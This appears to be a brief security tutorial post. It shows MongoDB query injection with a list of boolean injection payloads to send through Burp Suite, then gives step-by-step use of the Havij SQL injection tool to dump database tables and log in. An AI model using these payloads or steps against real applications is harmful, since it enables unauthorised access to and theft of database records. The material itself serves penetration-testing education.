Cyber Security | Web Development

 This is demo exploit for MongoDB filter option. Filter Accessories : Business Logic: if(this.category == ""Accessories") { / ...do something } Exploitation: if(this.category == 'Accessories' && this.limit == 3)  // Original if( this.category == 'Accessories ' || '1' == '1 ' && this.limit == 3 )  // Payload Injected { / ...do something } Capture the request in the burp suite. Try with combination of symbolic to make error the request. "   '   $   {   }  `   ; Try with combination of Boolean expression  ' && 1 == 1 ' && '1' == '1 ' || 1 == 1 ' || '1' == '1 ' || 1 || ' || 1 || ' ' || '1' == '1 Note: Make sure apply with encode is CTRL + U.   

Tool Name: Havij (Educational Purpose Only) Description: Havij is an automated SQL injection tool designed for penetration testers to identify and exploit SQL injection vulnerabilities in web applications. It streamlines the testing process, allowing security professionals to efficiently assess the security of a website's database interactions. Download URL:  https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/ Step 1:  Enter the application target link in the Havij tool and click analyze . Step 2: Get the application details from the Info Section. Step 3: Get the application database's from the  Tables  section. Step 4: Get the application database records with columns details. Successfully logged in the application as shown in the below screenshots.